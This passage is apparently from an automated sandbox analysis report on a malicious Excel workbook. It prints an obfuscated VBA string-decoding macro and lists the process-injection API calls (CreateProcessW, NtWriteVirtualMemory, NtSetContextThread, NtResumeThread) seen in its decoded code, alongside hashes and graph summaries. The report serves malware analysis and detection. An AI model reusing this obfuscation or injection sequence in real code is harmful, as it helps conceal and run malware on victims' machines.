                                              \xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xbf\xa1\xb2\xb3\xc0\xc1\xc2\xc3\xc4\xc5\xd2\xd3\xd4\xd5\xd6\xd9\xdb\xdc\xe0\xe1\xe2\xe3\xe4\xe5\xd8\xb6\xa7\xda\xa5"

                                              11

                                              \xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3 = " \xbf\xa1@#$%^&*()_+|01\xb2\xb3456789\xc0b\xc1d\xc2\xc3gh\xc4jklm\xc5\xd2\xd3q\xd4\xd5\xd6\xd9vw\xdb\xdcz.,-~A\xe0\xe1\xe2\xe3FGH\xe4JK\xe5MN\xd8\xb6QR\xa7T\xdaVWX\xa5Z?!23acefinoprstuxyBCDEILOPSUY"

                                              12

                                              For u = 1 To Len(\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6)

                                              Len("\V\xfffdZVQX\xfffd\xfffdT.\xfffd\xfffd\xfffd") -> 14

                                              executed
                                              13

                                              \xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8\xba\xa7\xb4\xab\xb5\xbb\xb7\xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae = InStr(\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb, Mid(\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6, u, 1))

                                              InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\") -> 0

                                              Mid

                                              executed
                                              14

                                              If \xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8\xba\xa7\xb4\xab\xb5\xbb\xb7\xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae > 0 Then

                                              15

                                              \xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7 = Mid(\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3, \xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8\xba\xa7\xb4\xab\xb5\xbb\xb7\xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae, 1)

                                              Mid

                                              16

                                              \xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab = \xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab + \xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7

                                              17

                                              Else

                                              18

                                              \xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab = \xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab + Mid(\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6, u, 1)

                                              Mid

                                              19

                                              Endif

                                              20

                                              Next

                                              Len("\V\xfffdZVQX\xfffd\xfffdT.\xfffd\xfffd\xfffd") -> 14

                                              executed
                                              21

                                              \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd = \xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab

                                              22

                                              End Function

                                              APIs | Meta Information

                                              Part of subcall function jumong@ThisWorkbook: Axgfhhdfthdsthdf

                                              Part of subcall function jumong@ThisWorkbook: Axgfhhdfthdsthdf

                                              Line | Instruction | Meta Information
                                              74

                                              Function WfgxfcGreanx() as Byte

                                              75

                                              WfgxfcGreanx = 100

                                              76

                                              Call xdfzfgxdb()

                                              77

                                              Function xdfzfgxdb() As Boolean ' BAD !

                                              78

                                              xdfzfgxdb = False

                                              79

                                              Call Doorroom()

                                              80

                                              Function Doorroom() As Double ' BAD !

                                              81

                                              Doorroom = Doorroom

                                              82

                                              Call yormmmom()

                                              83

                                              Function yormmmom() As Variant ' BAD !

                                              84

                                              yormmmom = jumong

                                              85

                                              End Function

                                              APIs | Meta Information

                                              Axgfhhdfthdsthdf

                                              Axgfhhdfthdsthdf

                                              Line | Instruction | Meta Information
                                              24

                                              Function jumong() as Long

                                              26

                                              jumong = fyjdfjfjfghjftghfdyhjdfyygyjfhgyjfgjfgtux

                                              27

                                              fyjdfjfjfghjftghfdyhjdfyygyjfhgyjfgjfgtux As Byte ' BAD !

                                              28

                                              fyjdfjfjfghjftghfdyhjdfyygyjfhgyjfgjfgtux = 102

                                              29

                                              Call Axgfhhdfthdsthdf()

                                              Axgfhhdfthdsthdf

                                              30

                                              Function Axgfhhdfthdsthdf() ' BAD !

                                              31

                                              Axgfhhdfthdsthdf

                                              Axgfhhdfthdsthdf

                                              32

                                              End Function


                                                Execution Graph

                                                Execution Coverage: 33%
                                                Dynamic/Decrypted Code Coverage: 100%
                                                Signature Coverage: 75.2%
                                                Total number of Nodes: 133
                                                Total number of Limit Nodes: 0
                                                [execution_graph: rendered call graph, not reproduced. Entry nodes 1a57a0, 1a5794, 1a3dc0 and 1a3db0; API nodes in the graph: CreateProcessW, NtReadVirtualMemory, VirtualAllocEx, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread.]

                                                Control-flow Graph

                                                Legend: Executed / Not Executed
                                                [control_flow_graph: rendered basic-block graph for the function at 1a4a69-1a5786, not reproduced. Calls in the graph: 1a48f4, 1a5d80/1a5d71, 1a6388/1a6381, 1a6488/1a6481, 1a65a8/1a65a0, 1a66f9/1a6700.]
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,
                                                • API String ID: 0-3772416878
                                                • Opcode ID: 824af86783286e1c63f160f6b3c874b79d1cca088360511876a2f353df08dc8e
                                                • Instruction ID: e5d9f9be4050981e18bda9091de1a364e90d9f1b1a90fdff7b16fb088603aa7d
                                                • Opcode Fuzzy Hash: 824af86783286e1c63f160f6b3c874b79d1cca088360511876a2f353df08dc8e
                                                • Instruction Fuzzy Hash: 0D628378A006289FDB64DF68CD85BDDBBB6AB89300F1480E9E40DA7351DB359E81CF50

                                                Control-flow Graph

                                                Legend: Executed / Not Executed
                                                [control_flow_graph: rendered basic-block graph for the function at 1a6850-1a739e, not reproduced. Calls in the graph: 1a4a3c, 1a73b8/1a73a8, 1a6388/1a6381, 1a6488/1a6481, 1a65a8/1a65a0, 1a66f9/1a6700.]
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ,
                                                • API String ID: 0-3772416878
                                                • Opcode ID: 6ae933fe4e4d9f53cf0cc6a308ba7cc8a9c40bae5bd6ef2b8f061b52a8d7c0c2
                                                • Instruction ID: 199d64e62b90930aee748c2dbbe6c8adf6ecba14251f4f1956c4a5884c562d7f
                                                • Opcode Fuzzy Hash: 6ae933fe4e4d9f53cf0cc6a308ba7cc8a9c40bae5bd6ef2b8f061b52a8d7c0c2
                                                • Instruction Fuzzy Hash: 07628478A002289FDB64DF68CD85BDDB7B6AB89310F1480EAE50DA7351DB359E81CF50

                                                Control-flow Graph

                                                Legend: Executed / Not Executed
                                                [control_flow_graph: rendered basic-block graph for the function at 1a57a0-1a5d36, not reproduced. CreateProcessW is called in block 1a5b8c-1a5c02; other calls in the graph: 1a0420.]
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 001A5BEF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 3b0045e58dba7d60d69c8786f04df03ea15eeb99326f66ead003184696f5f7f9
                                                • Instruction ID: 04db22748045b10274e8a8511adb4456ee2e4074f7510c5e4f3628425c26a0ce
                                                • Opcode Fuzzy Hash: 3b0045e58dba7d60d69c8786f04df03ea15eeb99326f66ead003184696f5f7f9
                                                • Instruction Fuzzy Hash: 4402C374E04628CFEB24CFA9C885B9DBBB2BF49304F1081A9E419B7251D734AE85CF55

                                                Control-flow Graph

                                                Legend: Executed / Not Executed
                                                [control_flow_graph: rendered basic-block graph for the function at 1a5794-1a5d36, not reproduced. CreateProcessW is called in block 1a5b8c-1a5c02; other calls in the graph: 1a0420.]
                                                APIs
                                                • CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 001A5BEF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: 72a022be842225df0188f089f172d1fee0b3d8c8c61dd499996d44a715124cfe
                                                • Instruction ID: 73c55ecb7f6c6b0ed779497c889d223b790a372027cadcc332f2ec4525cf4199
                                                • Opcode Fuzzy Hash: 72a022be842225df0188f089f172d1fee0b3d8c8c61dd499996d44a715124cfe
                                                • Instruction Fuzzy Hash: 66F1D274E04628CFEB24CFA9C885B9DBBB2BF49304F1481A9E819B7251D7349A85CF54
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ;FW_
                                                • API String ID: 0-2086131256
                                                • Opcode ID: fa8c7b43be6fbc69c03786a7d232e46f845a3da86f4822d6987a20aec620aa01
                                                • Instruction ID: 19110ac62a47c79286c05819d2be0cf55662ba9678c99eb0a35ace297db1d5bc
                                                • Opcode Fuzzy Hash: fa8c7b43be6fbc69c03786a7d232e46f845a3da86f4822d6987a20aec620aa01
                                                • Instruction Fuzzy Hash: B1421678A001598FEB50DFA8C580A9EFBF2BF8A305F19C595D448AB252CB74DD81CF94

                                                Control-flow Graph (rendered graph not reproduced; the graph marks a call to NtWriteVirtualMemory)
                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 001A6678
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID:
                                                • API String ID: 3527976591-0
                                                • Opcode ID: 6f6974ea286c0e05bd117136b731613510f3824f634dfd30c3046f7c5f1bb4e6
                                                • Instruction ID: 8ec22e150ad69229513733f066435031abe668f98de228baab25ac586bce9867
                                                • Opcode Fuzzy Hash: 6f6974ea286c0e05bd117136b731613510f3824f634dfd30c3046f7c5f1bb4e6
                                                • Instruction Fuzzy Hash: 7241CEB5D002589FDF00CFA9D984AEEFBF1BF49310F24942AE818B7250D335AA45CB54

                                                Control-flow Graph (rendered graph not reproduced; the graph marks a call to NtWriteVirtualMemory)
                                                APIs
                                                • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 001A6678
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID:
                                                • API String ID: 3527976591-0
                                                • Opcode ID: 8608833f061cfddc9a0a86c1b8ab43f664eda0c1de99dd7db01f8373df65a665
                                                • Instruction ID: d716813aa59dc98db8428ec606c43b1f9c581975c80b22b7c9d6016d01046abb
                                                • Opcode Fuzzy Hash: 8608833f061cfddc9a0a86c1b8ab43f664eda0c1de99dd7db01f8373df65a665
                                                • Instruction Fuzzy Hash: 7541CCB5D002589FCF00CFA9D984AEEFBF1BF49310F24902AE818B7250D339AA45CB54

                                                Control-flow Graph (rendered graph not reproduced; the graph marks a call to NtReadVirtualMemory)
                                                APIs
                                                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 001A630A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: MemoryReadVirtual
                                                • String ID:
                                                • API String ID: 2834387570-0
                                                • Opcode ID: 6771e2f6f32fbfabe1b2ed88245bd510cf0c45ebe07fc38387038ed99f2feab5
                                                • Instruction ID: cc04035aa4e0b750922f17a83f0a4ea253f28b85f3d630ba8190f010190cf859
                                                • Opcode Fuzzy Hash: 6771e2f6f32fbfabe1b2ed88245bd510cf0c45ebe07fc38387038ed99f2feab5
                                                • Instruction Fuzzy Hash: 1F41ACB9D002589FDF10CFA9D884AEEFBB1BF49310F14942AE814B7250C735A946CF65

                                                Control-flow Graph (rendered graph not reproduced; the graph marks a call to NtReadVirtualMemory)
                                                APIs
                                                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 001A630A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: MemoryReadVirtual
                                                • String ID:
                                                • API String ID: 2834387570-0
                                                • Opcode ID: ce2505a7ccd81ce8f58232d234517d1ad1e0bf78aacc07b813a3085059f1df7c
                                                • Instruction ID: 822c8391ac925e5ec9a05ff28576a2370197df27bfd1c63412583c9290b074bf
                                                • Opcode Fuzzy Hash: ce2505a7ccd81ce8f58232d234517d1ad1e0bf78aacc07b813a3085059f1df7c
                                                • Instruction Fuzzy Hash: 9941ACB9D002589FCF10CFA9D884AEEFBB1BF49310F14942AE818B7250D735AA45CF64

                                                Control-flow Graph (rendered graph not reproduced; the graph marks a call to NtSetContextThread)
                                                APIs
                                                • NtSetContextThread.NTDLL(?,?), ref: 001A67AF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: a7d1f2db431d5e4cd192449a5418a6c45ecebc2e5104b155a3b60b36dcae8e09
                                                • Instruction ID: 69805a0df587e3ab65e2d770d35cfe37480606471424819708686fc557562e59
                                                • Opcode Fuzzy Hash: a7d1f2db431d5e4cd192449a5418a6c45ecebc2e5104b155a3b60b36dcae8e09
                                                • Instruction Fuzzy Hash: 3B41BEB4D002589FDB10CFA9D884AEEFBF1BF49314F24842AE419B7250D7389A49CF54

                                                Control-flow Graph (rendered graph not reproduced; the graph marks a call to NtSetContextThread)
                                                APIs
                                                • NtSetContextThread.NTDLL(?,?), ref: 001A67AF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: 01b875b25e1a659c693b5125a4bb257e52313ae5397853881a85816e8b0cffba
                                                • Instruction ID: 18f9acebf021ba33bfda67e838f6d22e2da15a11027d0bf5cf2fa7efbe195cdb
                                                • Opcode Fuzzy Hash: 01b875b25e1a659c693b5125a4bb257e52313ae5397853881a85816e8b0cffba
                                                • Instruction Fuzzy Hash: 4631BCB4D002589FDB10CFA9D884AEEFBF1BF49314F24802AE419B7250D778AA49CF54

                                                Control-flow Graph (rendered graph not reproduced; the graph marks a call to NtResumeThread)
                                                APIs
                                                • NtResumeThread.NTDLL(?,?), ref: 001A6411
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: df32b5003d92985c06435bb893b28a3e42dc0806bbb631e31288b9a03e3f8c3d
                                                • Instruction ID: 60c36d54d0ee3ef78e9d34082d44acce56f3543a8458d0dfe5f6b2aa529ec446
                                                • Opcode Fuzzy Hash: df32b5003d92985c06435bb893b28a3e42dc0806bbb631e31288b9a03e3f8c3d
                                                • Instruction Fuzzy Hash: 8E31CBB9D002189FDB10CFA9D884ADEFBB5FF49310F24942AE815B7240D775AA46CB54

                                                Control-flow Graph (rendered graph not reproduced; the graph marks a call to NtResumeThread)
                                                APIs
                                                • NtResumeThread.NTDLL(?,?), ref: 001A6411
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.370661483.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_1a0000_VPZVQXDUT.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: a632be034871403156b450a25cdca945fc9fc0e45cc40d53e5baa05df5269853
                                                • Instruction ID: e5c628eb1c1cdb4635248b5f13e555b1ae284cdb6b6ecb4fc8ad5d08ee3eb2be
